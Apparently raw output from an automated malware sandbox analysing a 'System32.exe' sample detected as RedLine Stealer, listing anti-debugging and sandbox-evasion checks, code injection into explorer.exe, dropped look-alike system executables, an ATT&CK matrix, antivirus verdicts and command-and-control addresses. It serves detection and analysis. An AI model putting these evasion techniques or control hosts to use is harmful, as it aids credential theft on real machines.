                          Source: C:\Windows\Resources\Themes\icsys.icn.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Windows\Resources\svchost.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Windows\Resources\svchost.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Memory allocated: 2B30000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Memory allocated: 2CB0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Memory allocated: 4CB0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\Resources\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                          Source: C:\Windows\Resources\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                          Source: C:\Windows\Resources\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeWindow / User API: threadDelayed 429Jump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeWindow / User API: foregroundWindowGot 446Jump to behavior
                          Source: C:\Windows\Resources\svchost.exeWindow / User API: threadDelayed 845Jump to behavior
                          Source: C:\Windows\Resources\svchost.exeWindow / User API: threadDelayed 924Jump to behavior
                          Source: C:\Windows\Resources\svchost.exeWindow / User API: foregroundWindowGot 1516Jump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exe TID: 3472Thread sleep count: 429 > 30Jump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exe TID: 3472Thread sleep count: 88 > 30Jump to behavior
                          Source: C:\Windows\Resources\svchost.exe TID: 5396Thread sleep count: 845 > 30Jump to behavior
                          Source: C:\Windows\Resources\svchost.exe TID: 5396Thread sleep count: 924 > 30Jump to behavior
                          Source: explorer.exe, 00000005.00000002.3380482241.00000000012E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn% *&
                          Source: explorer.exe, 00000005.00000002.3380482241.00000000012E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3380482241.000000000132A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: system32.exe , 00000002.00000002.3376294690.000000000106C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: C:\Users\user\Desktop\System32.exeSystem information queried: ModuleInformationJump to behavior
                          Source: C:\Users\user\Desktop\System32.exeProcess information queried: ProcessInformationJump to behavior

                          Anti Debugging

                          barindex
                          Hides threads from debuggers
                          Source: C:\Users\user\Desktop\System32.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Windows\Resources\svchost.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Windows\Resources\svchost.exeThread information set: HideFromDebuggerJump to behavior
                          Tries to detect sandboxes and other dynamic analysis tools (window names)
                          Source: C:\Windows\Resources\svchost.exeOpen window title or class name: regmonclass
                          Source: C:\Windows\Resources\svchost.exeOpen window title or class name: gbdyllo
                          Source: C:\Windows\Resources\svchost.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                          Source: C:\Windows\Resources\svchost.exeOpen window title or class name: procmon_window_class
                          Source: C:\Windows\Resources\svchost.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                          Source: C:\Windows\Resources\svchost.exeOpen window title or class name: ollydbg
                          Source: C:\Windows\Resources\svchost.exeOpen window title or class name: filemonclass
                          Source: C:\Windows\Resources\svchost.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\Desktop\System32.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\System32.exeProcess queried: DebugObjectHandleJump to behavior
                          Source: C:\Users\user\Desktop\System32.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess queried: DebugObjectHandleJump to behavior
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeProcess queried: DebugObjectHandleJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeProcess queried: DebugObjectHandleJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\Resources\svchost.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\Resources\svchost.exeProcess queried: DebugObjectHandleJump to behavior
                          Source: C:\Windows\Resources\svchost.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeProcess queried: DebugObjectHandleJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeProcess queried: DebugObjectHandleJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\Resources\svchost.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\Resources\svchost.exeProcess queried: DebugObjectHandleJump to behavior
                          Source: C:\Windows\Resources\svchost.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Memory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          System process connects to network (likely due to code injection or exploit)
                          Source: C:\Windows\Resources\Themes\explorer.exeNetwork Connect: 173.194.221.82 80Jump to behavior
                          Injects code into the Windows Explorer (explorer.exe)
                          Source: C:\Windows\System32\svchost.exeMemory written: PID: 1016 base: 1C0000 value: 00Jump to behavior
                          Source: C:\Windows\System32\svchost.exeMemory written: PID: 1016 base: 3242D8 value: 00Jump to behavior
                          Source: C:\Windows\System32\svchost.exeMemory written: PID: 1016 base: 3251E8 value: 00Jump to behavior
                          Writes to foreign memory regions
                          Source: C:\Windows\System32\consent.exeMemory written: C:\Windows\System32\svchost.exe base: CEE7E7E398Jump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\Resources\Themes\explorer.exe "C:\windows\resources\themes\explorer.exe" ROJump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\consent.exe consent.exe 6016 322 0000022C4F0331F0Jump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\Resources\svchost.exe "C:\windows\resources\svchost.exe" ROJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Queries volume information: C:\Users\user\Desktop\system32.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Stealing of Sensitive Information

                          barindex
                          Yara detected RedLine Stealer
                          Source: Yara matchFile source: System32.exe, type: SAMPLE
                          Source: Yara matchFile source: 2.0.system32.exe .9c0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000002.00000000.2156076125.00000000009C2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: system32.exe PID: 7140, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\Desktop\system32.exe , type: DROPPED

                          Remote Access Functionality

                          barindex
                          Yara detected RedLine Stealer
                          Source: Yara matchFile source: System32.exe, type: SAMPLE
                          Source: Yara matchFile source: 2.0.system32.exe .9c0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000002.00000000.2156076125.00000000009C2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: system32.exe PID: 7140, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\Desktop\system32.exe , type: DROPPED

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                          Windows Service                          		1
                          Windows Service                          		231
                          Masquerading                          		OS Credential Dumping621
                          Security Software Discovery                          		Remote Services1
                          Archive Collected Data                          		1
                          Encrypted Channel                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault AccountsScheduled Task/Job1
                          Registry Run Keys / Startup Folder                          		311
                          Process Injection                          		34
                          Virtualization/Sandbox Evasion                          		LSASS Memory34
                          Virtualization/Sandbox Evasion                          		Remote Desktop ProtocolData from Removable Media1
                          Non-Standard Port                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAt1
                          DLL Side-Loading                          		1
                          Registry Run Keys / Startup Folder                          		1
                          Disable or Modify Tools                          		Security Account Manager1
                          Process Discovery                          		SMB/Windows Admin SharesData from Network Shared Drive3
                          Ingress Tool Transfer                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                          DLL Side-Loading                          		311
                          Process Injection                          		NTDS1
                          Application Window Discovery                          		Distributed Component Object ModelInput Capture3
                          Non-Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          Obfuscated Files or Information                          		LSA Secrets13
                          System Information Discovery                          		SSHKeylogging113
                          Application Layer Protocol                          		Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                          Software Packing                          		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          Timestomp                          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                          DLL Side-Loading                          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                          File Deletion                          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1575683 Sample: System32.exe Startdate: 16/12/2024 Architecture: WINDOWS Score: 100 59 googlecode.l.googleusercontent.com 2->59 61 codecmd03.googlecode.com 2->61 63 2 other IPs or domains 2->63 69 Multi AV Scanner detection for domain / URL 2->69 71 Found malware configuration 2->71 73 Antivirus / Scanner detection for submitted sample 2->73 75 11 other signatures 2->75 11 System32.exe 1 3 2->11         started        15 svchost.exe 2->15 injected 17 explorer.exe 2->17         started        19 svchost.exe 2->19         started        signatures3 process4 file5 55 C:\Windows\Resources\Themes\icsys.icn.exe, MS-DOS 11->55 dropped 57 C:\Users\user\Desktop\system32.exe, PE32 11->57 dropped 117 Query firmware table information (likely to detect VMs) 11->117 119 Drops executables to the windows directory (C:\Windows) and starts them 11->119 121 Hides threads from debuggers 11->121 125 2 other signatures 11->125 21 icsys.icn.exe 3 11->21         started        25 system32.exe 2 11->25         started        123 Injects code into the Windows Explorer (explorer.exe) 15->123 28 svchost.exe 1 15->28         started        30 explorer.exe 1 15->30         started        32 consent.exe 2 15->32         started        signatures6 process7 dnsIp8 51 C:\Windows\Resources\Themes\explorer.exe, MS-DOS 21->51 dropped 85 Antivirus detection for dropped file 21->85 87 Query firmware table information (likely to detect VMs) 21->87 89 Machine Learning detection for dropped file 21->89 91 Drops PE files with benign system names 21->91 34 explorer.exe 2 16 21->34         started        67 159.223.34.114, 1912, 49708, 49769 CELANESE-US United States 25->67 93 Hides threads from debuggers 28->93 95 Tries to detect sandboxes / dynamic malware analysis system (registry check) 28->95 97 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 28->97 99 Writes to foreign memory regions 32->99 file9 signatures10 process11 dnsIp12 65 googlecode.l.googleusercontent.com 173.194.221.82, 49759, 49771, 49777 GOOGLEUS United States 34->65 49 C:\Windows\Resources\spoolsv.exe, MS-DOS 34->49 dropped 77 Antivirus detection for dropped file 34->77 79 System process connects to network (likely due to code injection or exploit) 34->79 81 Query firmware table information (likely to detect VMs) 34->81 83 4 other signatures 34->83 39 spoolsv.exe 2 34->39         started        file13 signatures14 process15 file16 53 C:\Windows\Resources\svchost.exe, MS-DOS 39->53 dropped 101 Antivirus detection for dropped file 39->101 103 Query firmware table information (likely to detect VMs) 39->103 105 Machine Learning detection for dropped file 39->105 107 4 other signatures 39->107 43 svchost.exe 1 39->43         started        signatures17 process18 signatures19 109 Antivirus detection for dropped file 43->109 111 Detected CryptOne packer 43->111 113 Query firmware table information (likely to detect VMs) 43->113 115 6 other signatures 43->115 46 spoolsv.exe 1 43->46         started        process20 signatures21 127 Query firmware table information (likely to detect VMs) 46->127 129 Hides threads from debuggers 46->129 131 Tries to detect sandboxes / dynamic malware analysis system (registry check) 46->131 133 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 46->133

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          System32.exe85%VirustotalBrowse
                          System32.exe68%ReversingLabsWin32.Worm.Mofksys
                          System32.exe100%AviraTR/Dropper.Gen
                          System32.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Windows\Resources\spoolsv.exe100%AviraTR/Dropper.Gen
                          C:\Windows\Resources\Themes\icsys.icn.exe100%AviraTR/Dropper.Gen
                          C:\Windows\Resources\svchost.exe100%AviraTR/Dropper.Gen
                          C:\Windows\Resources\Themes\explorer.exe100%AviraTR/Dropper.Gen
                          C:\Windows\Resources\spoolsv.exe100%Joe Sandbox ML
                          C:\Users\user\Desktop\system32.exe 100%Joe Sandbox ML
                          C:\Windows\Resources\Themes\icsys.icn.exe100%Joe Sandbox ML
                          C:\Windows\Resources\svchost.exe100%Joe Sandbox ML
                          C:\Windows\Resources\Themes\explorer.exe100%Joe Sandbox ML
                          C:\Users\user\Desktop\system32.exe 87%ReversingLabsByteCode-MSIL.Trojan.RedLineStealz
                          C:\Users\user\Desktop\system32.exe 68%VirustotalBrowse

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          159.223.34.114:19120%Avira URL Cloudsafe
                          159.223.34.114:19125%VirustotalBrowse

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          googlecode.l.googleusercontent.com
                          		173.194.221.82
                          		truefalse
                            		high
                            codecmd01.googlecode.com
                            		unknown
                            		unknownfalse
                              		high
                              codecmd03.googlecode.com
                              		unknown
                              		unknownfalse
                                		high
                                codecmd02.googlecode.com
                                		unknown
                                		unknownfalse
                                  		high

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  159.223.34.114:1912true
                                  • 5%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://codecmd02.googlecode.com/files/tjcm.giffalse
                                    		high
                                    http://codecmd01.googlecode.com/files/tjcm.giffalse
                                      		high
                                      http://codecmd03.googlecode.com/files/tjcm.giffalse
                                        		high

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://codecmd01.googlecode.com/alexplorer.exe, 00000005.00000002.3380482241.000000000129A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://tempuri.org/Entity/Id24LRsystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://tempuri.org/Entity/Id20LRsystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://codecmd02.googlecode.com/files/tjcm.gif8explorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://tempuri.org/Entity/Id12Responsesystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://tempuri.org/Entity/Id2Responsesystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://codecmd02.googlecode.com/files/tjcm.gifLexplorer.exe, 00000005.00000002.3380482241.000000000131F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://tempuri.org/Entity/Id21Responsesystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://codecmd02.googlecode.com/files/tjcm.gifEexplorer.exe, 00000005.00000002.3380482241.000000000131F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://tempuri.org/Entity/Id17LRsystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://tempuri.org/Entity/Id9LRsystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://tempuri.org/Entity/pKsystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://tempuri.org/Entity/Id19Responsesystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://tempuri.org/Entity/Id13LRsystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://codecmd02.googlecode.com/files/tjcm.gif_explorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://tempuri.org/Entity/Id1LRsystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequencesystem32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://tempuri.org/Entity/Id5LRsystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://codecmd02.googlecode.com/files/tjcm.gifSexplorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://codecmd03.googlecode.com/Aexplorer.exe, 00000005.00000002.3380482241.000000000129A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://tempuri.org/Entity/Id15Responsesystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://codecmd02.googlecode.com/files/tjcm.giffexplorer.exe, 00000005.00000002.3380482241.000000000131F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://codecmd03.googlecode.com/i.dllexplorer.exe, 00000005.00000002.3380482241.000000000129A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://tempuri.org/Entity/Id6Responsesystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://api.ip.sb/ipsystem32.exe , 00000002.00000000.2156076125.00000000009C2000.00000002.00000001.01000000.00000007.sdmp, System32.exe, system32.exe .0.drfalse
                                                                                          		high
